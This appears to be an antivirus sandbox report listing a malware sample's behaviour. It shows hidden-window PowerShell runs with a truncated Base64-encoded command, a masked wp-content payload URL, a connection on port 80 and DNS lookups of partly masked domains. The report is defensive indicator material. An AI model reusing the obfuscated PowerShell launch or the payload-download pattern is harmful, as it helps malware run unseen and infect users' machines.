Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JAB0AHoAMAAwAFMAQwB1AGsAPQAnAGYAYwBCAEYAZAB6AG0AUwAnADsAJABJAEwASwBJAHUAOQAyACAAPQAgACcAMwAwADUAJwA7ACQAUQBoAGQAQQB6AHIAVwA4AD0AJwByAEcAagBDAEgAcQBFADIAJwA7ACQAQwBKAHQAaABGAG8AUQA9ACQAZ...
- 'cy########ityforyourbusiness.com':80
- http://av#####exclusive.com/wp-content/y8rdi1z7935/
- DNS ASK av#####exclusive.com
- DNS ASK he####andgrebe.com
- DNS ASK ma###anima.com
- DNS ASK cy########ityforyourbusiness.com
- DNS ASK qs##id.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JAB0AHoAMAAwAFMAQwB1AGsAPQAnAGYAYwBCAEYAZAB6AG0AUwAnADsAJABJAEwASwBJAHUAOQAyACAAPQAgACcAMwAwADUAJwA7ACQAUQBoAGQAQQB6AHIAVwA4AD0AJwByAEcAagBDAEgAcQBFADIAJwA7ACQAQwBKAHQAaABGAG8AUQA9ACQAZ...' (with hidden window)